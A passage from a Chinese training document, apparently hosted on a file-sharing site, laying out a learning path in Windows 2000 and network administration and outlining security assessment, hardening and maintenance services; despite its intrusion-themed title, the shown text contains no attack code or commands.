大的网络管理功能 ·h.能非常熟练的操作 win2000 ·i.知道 IP 地址,子网掩码,网? 关和 MAC 的区别 进阶 ·A.配置 IIS,知道各个选项的作用 ·B.配置 DNS,DHCP ·C.配置主控制? 域,辅助域 ·D.配置 DFS ·E.配置路由和远程访问 ·F.配置安全策略 IPSEC ·G.配置 service(服务) ·H.配置磁盘管理,磁盘分? 额 ·i. 配置 RAID(0,1,0+1,5) ·J.路由器的安装与简单配置 ·K.交换机的安装与? 简单配置 ·L.常见的 VPN,VLAN,NAT 配置 ·M.配置常见的企业级防火墙 ·N.配置常见的企业级防病毒软件 高级 ·之前我们学到的是任何一个想成为网络安全专家和黑客基本知识中的一? 部分 ·你作到了吗?? ·如果你做到了,足以找到一份很不错的工作! 配置负载均衡 ·配置 WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+负载均衡+ASP(? PHP.CGI)+CHECK PIONT(ISA SERVER) · ·配置三层交换网络 · ·配置各种复杂的? 网络环境 ·能策划一个非常完整的网络 · ·能独自组建一个大型的企业级网络? · ·能迅速解决网络中出现的各种疑难问题 结束 ·在你上面的都学好了,你已经是一个高级人才了,也是我们 VIP 培训的目? 标! ·可以找到一份非常好的工作 ·不会再因为给女朋友买不起玫瑰而发愁了! 安全: 导读 ·系统安全服务(SYSTEM) ·防火墙系统(FIREWALL) ·入侵检测(? IDS) ·身份验证(CA) ·网站监控和恢复(WEBSITE) ·安全电子商务(E-BUSINESS) ·? 安全电子邮件(E-MAIL) ·安全办公自动化(OA) ·Internet 访问和监控(A&C) ·病毒? 防范(VIRUS) ·虚拟局域网(VPN) 系统安全服务 ·系统安全管理 ·系统安全评估 ·系统安全加固 ·系统安全维护 ·安全技能? 学习 系统安全管理 ·信息系统安全策略 ·信息系统管理员安全手册 ·信息系统用? 户安全手册 ·紧急事件处理流程 系统安全评估 1、系统整体安全分析 · 分析用户的网络拓扑结构,以找出其结? 构性及网络 配置上存在的安全隐患。 · 通过考察用户信息设备的放置场地,以使得? 设备物理上是安全的。 · 分析用户信息系统的管理、使用流程,以使得系统 能够安? 全地管理、安全地使用 2、主机系统安全检测 · 通过对主机进行安全扫描,以发现? 系统的常见的安全漏洞。 · 对于特定的系统,采用特别的工具进行安全扫描。 · ? 根据经验,对系统存在的漏洞进行综合分析。 · 给出系统安全漏洞报告。 · 指出各个安全漏洞产生的原因以及会造成的危险。 · 给出修复安全漏洞的? 建议 3、网络设备安全检测 · 通过对网络进行安全扫描,以发现网络设备的安全漏? 洞。 · 根据经验,对网络设备存在的漏洞进行综合析。 · 给出网络设备安全漏洞? 报告。 · 指出各个安全漏洞产生的原因以及会造成的险。 · 给出修复安全漏洞的建议。 安全系统加固 ·为用户系统打最新安全补丁程序。 ·为用户修复系统、网络中? 的安全漏洞。 ·为用户去掉不必要的服务和应用系统。 ·为用户系统设置用户权限? 访问策略。 ·为用户系统设置文件和目录访问策略。 ·针对用户系统应用进行相应? 的安全处理。 安全系统维护 ·防火墙系统维护,安全日志分析 ·IDS 系统维护,安全日志分? 析 ·VPN 系统维护,安全日志分析 ·
/
本文档为【SQL网站入侵及黑客基础知识】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。 本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。 网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。

历史搜索

    清空历史搜索